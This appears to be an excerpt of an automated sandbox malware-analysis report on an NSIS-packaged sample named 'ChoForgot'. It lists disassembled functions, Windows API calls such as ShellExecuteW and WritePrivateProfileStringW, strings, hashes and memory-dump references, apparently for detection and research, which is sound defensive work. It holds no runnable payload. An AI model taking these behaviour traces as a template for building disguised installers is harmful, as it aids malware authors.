                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: Exch: stack < %d elements$FellowShoppercomMineralsDangerGifStructures$Pop: stack empty
                                                                                                                                                                                                                                                                                                        • API String ID: 1459762280-898558686
                                                                                                                                                                                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • FellowShoppercomMineralsDangerGifStructures, xrefs: 00402770
                                                                                                                                                                                                                                                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                                                                                                                        • <RM>, xrefs: 00402713
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: <RM>$FellowShoppercomMineralsDangerGifStructures$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                        • API String ID: 247603264-204554071
                                                                                                                                                                                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
